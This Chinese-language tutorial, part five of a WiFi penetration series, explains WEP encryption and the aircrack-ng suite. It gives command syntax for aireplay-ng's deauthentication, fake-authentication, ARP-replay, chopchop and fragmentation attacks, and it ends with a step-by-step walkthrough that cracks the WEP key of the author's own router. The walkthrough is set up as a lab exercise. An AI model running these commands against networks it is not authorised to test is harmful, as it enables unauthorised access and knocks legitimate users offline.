系列文章

無線WiFi安全滲透與攻防(一)之無線安全環(huán)境搭建
無線WiFi安全滲透與攻防(二)之打造專屬字典
無線WiFi安全滲透與攻防(三)之Windows掃描wifi和破解WiFi密碼
無線WiFi安全滲透與攻防(四)之kismet的使用

aircrack-ng破解WEP加密

1.WEP介紹

其實(shí)我們平常在使用wifi的時候，往往會用到的加密方式主要有WEP（pre-RSNA）, WPA(TKIP), WPA2(CCMP-AES), 如果有個別對安全要求比較高的也會使用企業(yè)級加密（802.1x）. 在最新的802.11-2010標(biāo)準(zhǔn)中，有明確的支持新的無線設(shè)備應(yīng)該拋棄WEP和WPA加密方式，而且必須支持WPA2加密方式，但是不得不接受的是，現(xiàn)在我們是有的大多數(shù)設(shè)備并沒有更新的這么快，廣泛的WEP和WPA仍然在使用中，而且新開發(fā)的設(shè)備也應(yīng)該保持對他們的兼容，所以即使在最新開發(fā)的產(chǎn)品中也并沒有完全按照802.11-2010的要求，直接放棄對WEP和WPA的支持。

剛開始了解無線加密，也有必要從WEP加密開始掌握WEP-WPA-WPA2-802.1x等相關(guān)知識，一是這些東西至少在當(dāng)前階段還用的上，二是后面那些更高級的加密方法其實(shí)根本上還是基于WEP加密思想改進(jìn)而來的。

其實(shí)無線加密主要是對數(shù)據(jù)在鏈路層進(jìn)行加密，如下圖，802.11主要是對physical[?f?z?kl]和Data-link層進(jìn)行了定義，而數(shù)據(jù)鏈路層又分成兩個部分，媒介訪問控制（MAC）和邏輯鏈路控制（LLC），無線數(shù)據(jù)的加密處理就是在MAC和LLC兩個階段中間做的事情，加密的對象就是MSDU。

所以對于沒有MSDP的無線幀是不用加密的，比如管理幀只攜帶layer [ler] 2的信息，不需要加密；控制幀只有頭部和尾部，不需要加密；空幀沒有數(shù)據(jù)域（但有特定的功能），也不需要加密； 總之，需要加密的幀，往往是數(shù)據(jù)幀。

2.認(rèn)證類型

加密的分類主要包括共享秘鑰認(rèn)證和開放系統(tǒng)認(rèn)證，WEP加密是共享秘鑰式，而TKIP、CCMP和802.1x則是開放系統(tǒng)，這兩種分類個人覺得主要區(qū)別是先完成秘鑰認(rèn)證再進(jìn)行關(guān)聯(lián)，還是先完成關(guān)聯(lián)再進(jìn)行秘鑰認(rèn)證。比如，它要求無線客戶端發(fā)送的authentication [???θent??ke??n] 報文中指定加密方式，如果是共享秘鑰就會進(jìn)行秘鑰的確認(rèn)，如果是開放系統(tǒng)，則會留到后面關(guān)聯(lián)成功后進(jìn)行秘鑰的確認(rèn)。

1.開放系統(tǒng)認(rèn)證

這種認(rèn)證方式不需要確認(rèn)STA的任何信息，它只是和AP進(jìn)行一個招呼式的交互，這個過程中并沒有交互身份信息，所以也可以認(rèn)為是一個空加密。這樣做的目的是，雙方都認(rèn)為應(yīng)該在后面使用更安全的加密方式，在這里只是先打個招呼，STA先進(jìn)來，我們慢慢坐下核對信息。所以STA發(fā)送的第一個Authentication [???θent??ke??n] 報文只要表面自己使用的開放系統(tǒng)認(rèn)證就好了，AP自然會給予successful答復(fù)，接著后面順利完成關(guān)聯(lián)。

2.共享秘鑰認(rèn)證

這種認(rèn)證方式使用WEP認(rèn)證STA，所以這種認(rèn)證的前提是STA和AP都有配置靜態(tài)的WEP秘鑰，因此認(rèn)證的目的就是確認(rèn)兩者使用的秘鑰是否一致。共享秘鑰認(rèn)證是通過4個認(rèn)證幀的交互來完成的，STA首先發(fā)送一個Authentication request給AP，然后AP會給STA回復(fù)一個挑戰(zhàn)明文，接著STA使用秘鑰對這個明文進(jìn)行加密并發(fā)送給ＡＰ，最后AP對其進(jìn)行解密，如果能夠解密成功并且明文一致則表示認(rèn)證成功并回復(fù)。

雖然看起來，共享秘鑰認(rèn)證比開放系統(tǒng)認(rèn)證會更安全，其實(shí)實(shí)際上并不是這樣，因?yàn)閷τ诠蚕砻罔€認(rèn)證，攻擊者可以捕獲明文內(nèi)容，也可以捕獲加密后的密文，那就很容易被破解，而且秘鑰一旦被破解，那么后面交互的所有數(shù)據(jù)包都能輕易的解密。

3.加密算法介紹

根據(jù)加密算法的分類，可以分為同步加密算法和異步加密算法：

同步加密算法：這種算法不管是加密還是解密，都是使用同一個秘鑰，為了確保數(shù)據(jù)的安全，就需要對這么秘鑰進(jìn)行保護(hù)，但問題是在進(jìn)行認(rèn)證的時候必須對這個秘鑰進(jìn)行確認(rèn)，那么就需要提出一種安全的確認(rèn)秘鑰的方法，這些方法包括WEP, TKIP, and CCMP。

異步加密算法：這種算法包含了兩個秘鑰，分別是公鑰和私鑰，公鑰用于消息的加密，私鑰用于消息的解密，所以即使有好多人知道公鑰，沒有私鑰也破解不了消息。

流加密和塊加密： 流加密以一個bit為單位進(jìn)行處理，塊加密以一個塊為單位進(jìn)行處理

4.WEP加密和解密

1.加密

WEP是一個Layer 2的加密方法，它使用的是ARC4流加密。它有一個數(shù)據(jù)完整性校驗(yàn)操作，也就是Integrity Check Value (ICV)，這個值是通過計算為加密的數(shù)據(jù)域（MSDU）而來的。

802.11標(biāo)準(zhǔn)定義了兩個WEP版本，分別是WEP-40和WEP-104支持64bit和128bit加密，其實(shí)40和104都是從64與128減24得來的，這24位叫初始化向量Initialization Vector (IV)，注意和ICV進(jìn)行區(qū)分。

40和104則是指靜態(tài)秘鑰的bit長度，也就是說

WEP-40支持輸入10 hex characters or 5 ASCII characters,10位16進(jìn)制或5位ASCII字符

WEP-104支持輸入26 hex characters or 13 ASCII characters:26位16進(jìn)制或13位ASCII 字符

一般來說，WEP支持4個key，使用時從中選一個進(jìn)行加密。

那么WEP加密過程是怎么實(shí)現(xiàn)的呢？下面根據(jù)流程圖來分析一下

（1） IV是動態(tài)生成的24bit隨機(jī)數(shù)，標(biāo)準(zhǔn)沒有指定應(yīng)該怎么生成，而且在數(shù)據(jù)幀中以明文的方式進(jìn)行發(fā)送，它和key結(jié)合生成隨機(jī)種子（seed），然后運(yùn)用CR4算法生成秘鑰流（keystream）。

（2）對需要加密的明文進(jìn)行CRC-32運(yùn)算，生成 ICV（32位），然后將這個 ICV 追加到 plaintext的后面

（3）將尾部有 ICV的plaintext 與密碼流進(jìn)行異或運(yùn)算，得到加密數(shù)據(jù)

（4）將 IV 添加到加密數(shù)據(jù)的前面，進(jìn)行傳送。

下面是WEP加密后的一個數(shù)據(jù)幀MPDU 格式：

從上圖可以看出，在幀體部分包括 IV + MSDU + ICV：

IV一共是4個字節(jié)，前3個字節(jié)是24bit的初始化向量，后面6bit暫時預(yù)留空白沒用，最后兩個bit用來指定使用哪個key，我們前面有提到過，WEP可以配置4個KEY。

MSDU和ICV是被加密的，在解密的時候，需要檢驗(yàn)ICV是否一致

2.解密

和加密相反，解密也需要這幾個過程：

（1）IV和key結(jié)合生成隨機(jī)種子（seed），然后運(yùn)用ACR4算法生成秘鑰流（keystream）

（2）將keystream和加密數(shù)據(jù)進(jìn)行異或，得到 plaintext 和 ICV

（3）根據(jù)解密后得到的 plaintext 再計算一個 ICV 和包中的 ICV進(jìn)行比較，判斷是否相等，這也算是一個可靠性的保證。

5.Aircrack-ng 常用工具包

aircrack-ng：破解

airmon-ng：改變網(wǎng)卡工作模式，將網(wǎng)卡從Managed Mode 改變?yōu)?Monitor Mode

airodump-ng：抓包工具，用于捕獲報文

aireplay-ng：提供各種攻擊，為airodump-ng創(chuàng)造更多的報文

airserv-ng：網(wǎng)卡連接到指定端口 可以用來做無線跳板

airolib-ng：彩虹表破解創(chuàng)建數(shù)據(jù)庫文件

airdecap-ng：解包

6.Aireplay-ng 的 6 種攻擊模式詳解

1.沖突模式

-0 Deautenticate 沖突模式

使已經(jīng)連接的合法客戶端強(qiáng)制斷開與路由端的連接，使其重新連接。在重新連接過程中獲得驗(yàn)證數(shù)據(jù)包，從而產(chǎn)生有效 ARP request。

如果一個客戶端連在路由端上，但是沒有人上網(wǎng)以產(chǎn)生有效數(shù)據(jù)，此時，即使用-3 也無法產(chǎn)生有效 ARP request。所以此時需要用-0 攻擊模式配合，-3 攻擊才會被立刻激活。

aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0
【-0】：沖突攻擊模式，后面跟發(fā)送次數(shù)（設(shè)置為 0，則為循環(huán)攻擊，不停的斷開連接，客戶端無法正常上網(wǎng)）
【-a】：設(shè)置 ap 的 mac
【-c】：設(shè)置已連接的合法客戶端的 mac。
如果不設(shè)置-c，則斷開所有和 ap 連接的合法客戶端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注：使用此攻擊模式的前提是必須有通過認(rèn)證的合法的客戶端連接到路由器

2.偽裝客戶端連接

-1 fakeauth count 偽裝客戶端連接

這種模式是偽裝一個客戶端和 AP 進(jìn)行連接。

這步是無線客戶端的研究學(xué)習(xí)的第一步，因?yàn)槭菬o合法連接的客戶端，因此需要一個偽裝客戶端來和路由器相連。為讓 AP 接受數(shù)據(jù)包，必須使自己的網(wǎng)卡和 AP 關(guān)聯(lián)。如果沒有關(guān)聯(lián)的話，目標(biāo) AP 將忽略所有從你網(wǎng)卡發(fā)送的數(shù)據(jù)包，IVS 數(shù)據(jù)將不會產(chǎn)生。

用-1 偽裝客戶端成功連接以后才能發(fā)送注入命令，讓路由器接受到注入命令后才可反饋數(shù)據(jù)從而產(chǎn)生 ARP 包。

aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
參數(shù)說明：
【-1】：偽裝客戶端連接模式，后面跟延時
【-e】：設(shè)置 ap 的 essid
【-a】：設(shè)置 ap 的 mac
【-h】：設(shè)置偽裝客戶端的網(wǎng)卡 MAC（即自己網(wǎng)卡 mac）

3.交互模式

-2 Interactive 交互模式

這種攻擊模式是一個抓包和提數(shù)據(jù)發(fā)攻擊包，三種集合一起的模式

1．這種模式主要用于研究學(xué)習(xí)無客戶端，先用-1 建立虛假客戶端連接然后直接發(fā)包攻擊

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
參數(shù)說明：
【-2】：交互攻擊模式
【-p】：設(shè)置控制幀中包含的信息（16 進(jìn)制），默認(rèn)采用 0841
【-c】：設(shè)置目標(biāo) mac 地址
【-b】：設(shè)置 ap 的 mac 地址
【-h】：設(shè)置偽裝客戶端的網(wǎng)卡 MAC（即自己網(wǎng)卡 mac）

2．提取包，發(fā)送注入數(shù)據(jù)包， 發(fā)包攻擊。

 aireplay-ng -2 –r <file> -x 1024 wifi0
 -x 1024 是限定發(fā)包速度，避免網(wǎng)卡死機(jī)，可以選擇 1024

4.注入攻擊模式

-3 ARP-request 注入攻擊模式

這種模式是一種抓包后分析重發(fā)的過程 這種攻擊模式很有效。既可以利用合法客戶端，也可以配合-1 利用虛擬連接的偽裝客戶端。如果有合法客戶端那一般需要等幾分鐘，讓合法客戶端和 ap 之間通信，少量數(shù)據(jù)就可產(chǎn)生有效 ARP request 才可利用-3模式注入成功。如果沒有任何通信存在，不能得到 ARP request.，則這種攻擊就會失敗。

如果合法客戶端和ap之間長時間內(nèi)沒有 ARP request，可以嘗試同時使用-0 攻擊. 如果沒有合法客戶端，則可以利用-1 建立虛擬連接的偽裝客戶端，連接過程中獲得驗(yàn)證數(shù)據(jù)包，從而產(chǎn)生有效 ARP request。再通過-3 模式注入。

aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
參數(shù)說明：
【-3】：arp 注入攻擊模式
【-b】：設(shè)置 ap 的 mac
【-h】：設(shè)置自己的mac地址
【-x】：定義每秒發(fā)送數(shù)據(jù)戶包的數(shù)量，但是最高不超過 1024，建議使用 512（也可不定義）

5.Chopchop 攻擊模式

-4 Chopchop 攻擊模式

用以獲得一個包含密鑰數(shù)據(jù)的 xor 文件 這種模式主要是獲得一個可利用包含密鑰數(shù)據(jù)的 xor 文件，不能用來解密數(shù)據(jù)包。而是用它來產(chǎn)生一個新的數(shù)據(jù)包以便我們可以進(jìn)行注入。

aireplay-ng -4 -b <ap mac> -h <my mac> wifi0 
參數(shù)說明：
【-b】：設(shè)置需要研究學(xué)習(xí)的 AP 的 mac
【-h】：設(shè)置虛擬偽裝連接的 mac（即自己網(wǎng)卡的 mac）

6.碎片包攻擊模式

-5 fragment 碎片包攻擊模式

用以獲得 PRGA(包含密鑰的后綴為 xor 的文件) 這種模式主要是獲得一個可利用 PRGA，這里的 PRGA 并不是 wep key 數(shù)據(jù)，不能用來解密數(shù)據(jù)包。而是用它來產(chǎn)生一個新的數(shù)據(jù)包以便我們可以進(jìn)行注入。其工作原理就是使目標(biāo) AP 重新廣播包，當(dāng) AP 重廣播時，一個新的 IVS 將產(chǎn)生，我們就是利用這個來研究學(xué)習(xí)

aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
【-5】：碎片包攻擊模式
【-b】：設(shè)置 ap 的 mac
【-h】：設(shè)置虛擬偽裝連接的 mac（即自己網(wǎng)卡的 mac）

7.WEP wifi破解步驟

1.環(huán)境準(zhǔn)備

1.路由器介紹

本文使用的路由器為：思科企業(yè)級內(nèi)置雙天線cvr100無線路由器，支持WEP，WPA，WPS加密方式，一般的家用路由器或者比較新的路由器不支持以上三種模式。

2.路由器配置

1.選擇無線配置，設(shè)置wifi信道為1

2.選擇無線wifi–設(shè)置安全模式

3.安全模式選擇wep，輸入口令-點(diǎn)擊生成密鑰，點(diǎn)擊顯示密鑰，點(diǎn)擊保存

2.查看網(wǎng)卡是否連接到kali

ip a

3.開啟Monitor Mode工作模式

airmon-ng start wlan0

4.掃描附近的wifi

確定目標(biāo)wifi的信道，加密方式，信號強(qiáng)度，mac地址等信息

airodump-ng wlan0mon

5.對目標(biāo)所在信道進(jìn)行抓包

airodump-ng wlan0mon -c 1 --ivs -w /root/wifi/bk01/WEP --bssid 10:BD:18:08:43:31
-c:信道
--ivs：初始化向量
-w:輸出抓包文件
--bssid:指定wifi進(jìn)行抓包

6.手工創(chuàng)建客戶端連接

設(shè)備連接wifi

當(dāng)有設(shè)備連接AP時，工具會捕獲到這個客戶端的mac地址即相關(guān)信息

7.進(jìn)行ARP注入攻擊

arp重放攻擊，通過模擬客戶端發(fā)送ARP請求，獲取AP的響應(yīng)報文，通過AP報文獲取ivs初始化向量

aireplay-ng -3 -b 10:BD:18:08:43:31 -h 68:54:5A:85:CB:40 wlan0mon
-3:arpreplay：arp重放攻擊
-b:bssid AP的mac地址
-h:客戶端的mac地址

遇到這個錯誤時，重新連接wifi會一直報【無法連接到該wifi】，這時候，需要ctrl+C停掉arp重放攻擊，然后重新在發(fā)起一個新的arp重放攻擊，在連接wifi就ok了

8.使用Deautenticate攻擊模式

使已經(jīng)連接的合法客戶端強(qiáng)制斷開與路由端的連接，使其重新連接。在重新連接過程中獲得驗(yàn)證數(shù)據(jù)包，從而產(chǎn)生有效 ARP request。（也不一定能成功，不成功多試幾次）

aireplay-ng -0 5 -a 10:BD:18:08:43:31 -c 68:54:5A:85:CB:40 wlan0mon
-0：沖突攻擊模式，后面跟發(fā)送次數(shù)（設(shè)置為 0，則為循環(huán)攻擊，不停的斷開連接，客戶端無法正常上網(wǎng)）
-a:設(shè)置 ap 的 mac
-c：設(shè)置已連接的合法客戶端的 mac

9.手動連接AP

等待Frame到5-10萬時，就可以嘗試破解了

10.破解WIFI，獲取WEP密碼

aircrack-ng /root/wifi/bk01/WEP-01.ivs

遇到這種說明ivs樣本不夠，按ctrl+c退出，在等一會重新執(zhí)行破解命令就可以。也可以在這個界面保持不動，當(dāng)ivs達(dá)到5000時，他會自動重新破解

ivs樣本足夠時，很快就能破解出來了

把冒號去掉就是密鑰了，然后用這個密鑰就可以連接WEP加密的WIFI了文章來源地址http://www.zghlxwxcb.cn/news/detail-408997.html

到了這里，關(guān)于無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！